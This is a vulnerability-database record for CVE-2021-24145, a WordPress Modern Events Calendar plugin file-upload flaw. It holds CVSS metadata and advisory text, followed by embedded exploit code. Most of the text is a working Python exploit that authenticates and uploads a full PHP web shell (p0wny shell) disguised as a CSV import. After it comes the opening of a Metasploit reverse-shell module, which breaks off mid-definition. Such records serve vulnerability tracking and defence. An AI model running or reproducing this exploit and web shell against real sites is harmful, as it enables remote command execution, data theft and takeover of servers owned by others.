# CVE-2021-24145
WordPress File Upload Vulnerability, Modern Eve...
{"id": "A7E0CB1F-898C-551C-B6E7-E50EF94F99AB", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Webnus Modern Events Calendar Lite", "description": "# CVE-2021-24145\nWordPress File Upload Vulnerability, Modern Eve...", "published": "2021-08-14T02:56:50", "modified": "2022-05-08T06:54:55", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-24145"], "immutableFields": [], "lastseen": "2022-05-08T09:33:39", "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0496"]}, {"type": "cve", "idList": ["CVE-2021-24145"]}, {"type": "exploitdb", "idList": ["EDB-ID:50082"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163346", "PACKETSTORM:163672"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED"]}, {"type": "wpexploit", "idList": ["WPEX-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610"]}, {"type": 
"wpvulndb", "idList": ["WPVDB-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610"]}, {"type": "zdt", "idList": ["1337DAY-ID-36503", "1337DAY-ID-36594"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0496"]}, {"type": "cve", "idList": ["CVE-2021-24145"]}, {"type": "exploitdb", "idList": ["EDB-ID:50082"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163346", "PACKETSTORM:163672"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}, {"type": "wpexploit", "idList": ["WPEX-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610"]}, {"type": "zdt", "idList": ["1337DAY-ID-36503"]}]}, "exploitation": null, "vulnersScore": 5.2}, "_state": {"dependencies": 0}, "_internal": {}, "privateArea": 1}
{"cve": [{"lastseen": "2022-03-23T14:47:46", "description": "Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T15:15:00", "type": "cve", "title": "CVE-2021-24145", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145"], "modified": "2021-12-03T18:07:00", "cpe": [], "id": "CVE-2021-24145", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24145", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:04", "description": "A remote code execution vulnerability exists in WordPress Modern Events Calendar Plugin. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Modern Events Calendar Plugin Remote Code Execution (CVE-2021-24145)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145"], "modified": "2021-08-18T00:00:00", "id": "CPAI-2021-0496", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-04T15:53:04", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "zdt", "title": "Wordpress Modern Events Calendar 5.16.2 Plugin - Remote 
Code Execution (Authenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145"], "modified": "2021-07-02T00:00:00", "id": "1337DAY-ID-36503", "href": "https://0day.today/exploit/description/36503", "sourceData": "# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://webnus.net/modern-events-calendar/\n# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip\n# Version: Before 5.16.5\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2021-24145\n# CWE: CWE-434\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md\n\n'''\nDescription:\nArbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5,\ndid not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv'\ncontent-type in the request.\n'''\n\n\n'''\nBanner:\n'''\nbanner = \"\"\"\n ______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ \n / ___\\ \\ / / ____| |___ \\ / _ \\___ \\/ | |___ \\| || | / | || || ___| \n| | \\ \\ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \\ \n| |___ \\ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) |\n \\____| \\_/ |_____| |_____|\\___/_____|_| |_____| |_| |_| |_||____/ \n \n * Wordpress Plugin Modern Events Calendar Lite RCE \n * @Hacker5preme\n 
\n\n\"\"\"\nprint(banner)\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nwp_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\nprint('')\n\n'''\nAuthentication:\n'''\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'\n\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'log': username,\n 'pwd': password,\n 'wp-submit': 'Log In',\n 'testcookie': '1'\n}\n\n# Authenticate:\nprint('')\nauth = session.post(auth_url, headers=header, data=body)\nauth_header = auth.headers['Set-Cookie']\nif 'wordpress_logged_in' in auth_header:\n print('[+] Authentication successfull !')\nelse:\n print('[-] Authentication failed !')\n exit()\n\n\n'''\nExploit:\n'''\nexploit_url = \"http://\" + target_ip + ':' + target_port + wp_path + \"wp-admin/admin.php?page=MEC-ix&tab=MEC-import\"\n\n# Exploit Header:\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n \"Accept\": 
\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------29650037893637916779865254589\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Upgrade-Insecure-Requests\": \"1\"\n}\n\n# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell\nbody = \"-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"feed\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: text/csv\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => 
getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>[email\u00a0protected]:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n 
align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = 
eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? 
currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"[email\u00a0protected]:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) 
{\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 
200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. 
_|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"mec-ix-action\\\"\\r\\n\\r\\nimport-start-bookings\\r\\n-----------------------------29650037893637916779865254589--\\r\\n\"\n\n# Exploit\nsession.post(exploit_url, headers=header, data=body)\nprint('')\nprint('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php')\nprint('')\n", "sourceHref": "https://0day.today/exploit/36503", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-22T15:28:36", "description": "This Metasploit module allows an attacker with a privileged WordPress account to launch a reverse shell due to an arbitrary file upload vulnerability in WordPress Modern Events Calendar plugin versions prior to 5.16.5. This is due to an incorrect check of the uploaded file extension. Indeed, by using text/csv content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin. 
Finally, the uploaded payload can be triggered by a call to /wp-content/uploads/<random_payload_name>.php.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "zdt", "title": "WordPress Modern Events Calendar Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145"], "modified": "2021-07-26T00:00:00", "id": "1337DAY-ID-36594", "href": "https://0day.today/exploit/description/36594", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution',\n 'Description' => %q{\n This module allows an attacker with a privileged 
Wordpress account to launch a reverse shell\n due to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5.\n This is due to an incorrect check of the uploaded file extension.\n Indeed, by using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin.\n Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php`\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nguyen Van Khanh', # Original PoC and discovery\n 'Ron Jost', # Exploit-db\n 'Yann Castel (yann.castel[at]orange.com)' # Metasploit module\n ],\n 'References' =>\n [\n ['EDB', '50115'],\n ['CVE', '2021-24145'],\n ['CWE', '434']\n ],\n 'Platform' => [ 'php' ],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Wordpress Modern Events Calendar < 5.16.5', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2021-01-29',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options [\n OptString.new('USERNAME', 